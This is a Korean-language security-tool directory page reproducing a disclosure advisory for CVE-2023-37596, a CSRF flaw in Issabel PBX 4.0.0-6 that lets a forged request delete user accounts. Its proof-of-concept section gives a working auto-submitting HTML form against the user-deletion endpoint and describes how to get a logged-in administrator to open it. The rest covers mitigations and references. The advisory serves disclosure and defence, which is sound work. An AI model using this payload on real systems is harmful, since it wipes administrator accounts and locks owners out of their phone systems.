Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-37596 — CVE-2023-37596은 널리 사용되는 오픈소스 통합 커뮤니케이션 플랫폼인 Issabel PBX 버전 4.0.0-6에서 발견된 사이트 간 요청 위조(CSRF) 취약점입니다. | Kitploit
도구/GitHubGitHub/sahiloj/cve-2023-37596
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubsahiloj/cve-2023-37596

CVE-2023-37596

CVE-2023-37596은 널리 사용되는 오픈소스 통합 커뮤니케이션 플랫폼인 Issabel PBX 버전 4.0.0-6에서 발견된 사이트 간 요청 위조(CSRF) 취약점입니다.

저장소 보기
116개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-37596 — issabel-pbx 4.0.0-6: 사이트 간 요청 위조(CSRF) — 모든 사용자 삭제

심각도: 높음  |  CVSS v3.1: 8.1 (AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H)  |  CWE: CWE-352


목차

  • 개요
  • 취약점 세부 정보
  • 영향
  • 영향을 받는 버전
  • 공격 시나리오
  • 개념 증명(재현 단계)
  • 완화 / 해결 방안
  • 참고 자료
  • 공개 타임라인
  • 작성자

개요

Issabel PBX 4.0.0-6 버전에서 사이트 간 요청 위조(CSRF) 취약점이 발견되었습니다. 사용자 관리 엔드포인트에는 CSRF 보호 기능이 구현되어 있지 않아, 인증되지 않은 원격 공격자가 악성 웹 페이지를 제작하여 인증된 Issabel 관리자가 해당 페이지를 방문하면 시스템에서 모든 사용자 계정을 조용히 삭제할 수 있습니다. 반복적으로 악용하면 모든 관리 사용자를 제거하여 전체 애플리케이션에 접근할 수 없게 만들 수 있습니다.


취약점 세부 정보

필드값
CVE IDCVE-2023-37596
취약점 유형사이트 간 요청 위조(CSRF)
CWECWE-352
제품Issabel PBX
취약 버전4.0.0-6
공급업체 홈페이지https://www.issabel.org/
소프트웨어 저장소https://github.com/IssabelFoundation/issabelPBX
테스트 환경Windows
CVE 게시일10/07/2023
발견자Sahil Ojha

영향

Issabel PBX는 사용자 관리 인터페이스에 대한 상태 변경 요청의 출처를 검증하지 않기 때문에, 성공적인 CSRF 공격을 통해 공격자는 다음을 수행할 수 있습니다:

  • 모든 사용자 계정 삭제 — 기본 관리자를 포함하여 — 피해자가 인지하지 못한 채.
  • 서비스 거부(DoS) 유발 — 모든 사용자를 제거하면 아무도 로그인할 수 없게 되어 PBX 관리 패널에 완전히 접근할 수 없게 됩니다.
  • 전화 서비스 중단 — 서버 수준에서 계정을 수동으로 복구할 때까지 전화 시스템 구성 및 관리가 불가능해집니다.

영향을 받는 버전

제품영향을 받는 버전상태
issabel-pbx4.0.0-6취약함

공격 시나리오

공격자는 Issabel PBX 애플리케이션의 사용자 삭제 엔드포인트를 대상으로 하는 위조된 HTTP 요청을 포함한 악성 HTML 페이지를 호스팅합니다. Issabel에 이미 인증된 사용자가 동일한 브라우저에서 악성 페이지를 방문하면 공격이 자동으로(또는 버튼 클릭 시) 트리거됩니다. 브라우저는 모든 요청에 피해자의 세션 쿠키를 자동으로 포함하므로, 서버는 위조된 삭제 요청을 정당한 요청으로 수락합니다.

공격자 측에는 특별한 권한이 필요하지 않습니다 — 인증된 관리자를 조작된 페이지로 유인하기 위한 사회공학적 벡터(피싱 링크, 악성 광고 등)만 있으면 됩니다.

이 공격의 주요 특징:

  • 인증 불필요 — 공격자 측에는 인증이 필요하지 않습니다.
  • 단 한 번의 클릭(또는 `` / 자동 제출 양식을 사용할 경우 클릭 없이도)으로 익스플로잇을 트리거할 수 있습니다.
  • 모든 사용자 ID(예: id=1, id=2, …)는 페이로드를 수정하여 공격 대상으로 삼을 수 있습니다.
  • 공격은 피해자에게 보이지 않습니다. 페이지는 관련 없는 콘텐츠를 표시하면서 위조된 요청을 조용히 제출할 수 있습니다.

개념 증명(재현 단계)

사전 요구 사항

  • Burp Suite(커뮤니티 또는 프로페셔널 에디션)
  • Burp Suite를 통해 트래픽을 프록시하도록 구성된 브라우저
  • 네트워크에서 접근 가능한 Issabel PBX 4.0.0-6 인스턴스

1단계 — 관리자로 로그인

Issabel PBX 사용자 목록 페이지로 이동하여 관리자 자격 증명으로 인증합니다:

root@kitploit:~
https://<Issabel-IP>/index.php?menu=userlist

1단계 — Issabel PBX 사용자 목록


2단계 — Burp Suite에서 사용자 삭제 요청 캡처

  1. Burp Suite 프록시를 활성화한 상태에서 대상 사용자 옆의 Delete 버튼을 클릭합니다.
  2. Burp Suite의 Proxy → HTTP history에서 캡처된 DELETE/POST 요청을 찾습니다.
  3. 요청을 마우스 오른쪽 버튼으로 클릭하고 Engagement Tools → Generate CSRF PoC를 선택합니다.

2단계 — Burp Suite에서 삭제 요청 캡처


3단계 — CSRF 익스플로잇 생성 및 저장

Burp Suite는 아래와 유사한 HTML 페이지를 생성합니다. 이를 .html 파일(예: csrf_exploit.html)로 저장합니다:

root@kitploit:~
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://<Issabel-IP>/index.php?menu=userlist" method="POST">
      <input type="hidden" name="action" value="delete" />
      <input type="hidden" name="id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      // Auto-submit the form as soon as the page loads
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

참고: <Issabel-IP>를 대상 서버의 IP 주소 또는 호스트 이름으로 바꾸고, 다른 사용자 계정을 대상으로 하려면 id 값을 조정하세요.


4단계 — 인증된 관리자에게 익스플로잇 전달

csrf_exploit.html 파일(또는 호스팅된 위치의 링크)을 현재 Issabel PBX에 로그인된 사용자에게 전송합니다. 피해자가 페이지를 열면 양식이 자동으로 제출되어 확인 프롬프트 없이 대상 사용자가 삭제됩니다.

4단계 — CSRF 익스플로잇 실행, 사용자 삭제됨

4단계 — 사용자 제거 확인


완화 / 해결 방안

이 취약점을 해결하기 위해 공급업체 및/또는 시스템 관리자는 다음 방어 조치를 적용해야 합니다:

  1. CSRF 토큰 구현 — 모든 상태 변경 요청에 대해 암호학적으로 무작위한 세션별(또는 요청별) 토큰을 생성하고 서버 측에서 검증합니다. 유효한 토큰이 없는 요청은 거부해야 합니다.

  2. SameSite 쿠키 속성 — 세션 쿠키의 SameSite 속성을 Strict 또는 Lax로 설정하여 대부분의 브라우저에서 교차 출처 요청이 세션 쿠키를 포함하지 못하게 합니다.

  3. Origin / Referer 헤더 검증 — 서버 측에서 Origin 또는 Referer 헤더가 애플리케이션 자체 도메인과 일치하지 않는 모든 상태 변경 요청을 거부합니다.

  4. 파괴적 작업에 대한 재인증 요구 — 사용자 계정 삭제와 같은 되돌릴 수 없는 작업을 처리하기 전에 사용자에게 비밀번호를 다시 입력하도록 요청합니다.

  5. 최소 권한 원칙 적용 — 명시적인 관리자 역할을 가진 사용자만 사용자 삭제 기능에 접근할 수 있도록 하여 성공적인 공격의 피해 범위를 줄입니다.

공급업체 패치가 제공될 때까지 관리자는 다음을 권장합니다:

  • 방화벽 규칙을 통해 Issabel PBX 관리 패널에 대한 접근을 신뢰할 수 있는 IP 주소로 제한합니다.
  • 관리 패널에 로그인한 상태에서 신뢰할 수 없는 웹사이트를 방문하지 않도록 합니다.

참고 자료

  • NVD — CVE-2023-37596
  • OWASP — 사이트 간 요청 위조(CSRF)
  • CWE-352: 사이트 간 요청 위조(CSRF)
  • Issabel PBX 공식 웹사이트
  • GitHub의 IssabelFoundation/issabelPBX
  • PortSwigger — CSRF

공개 타임라인

날짜이벤트
10/07/2023취약점 발견 및 보고
10/07/2023CVE-2023-37596 지정

작성자

Sahil Ojha

  • 보안 연구원
  • CVE: CVE-2023-37596

면책 조항: 이 저장소는 교육 및 책임 있는 공개 목적으로만 게시됩니다. 여기에 제공된 정보는 시스템 소유자의 명시적인 서면 허가 없이 시스템을 공격하는 데 사용되어서는 안 됩니다. 작성자는 이 정보의 오용에 대해 어떠한 책임도 지지 않습니다.

도구 다운로드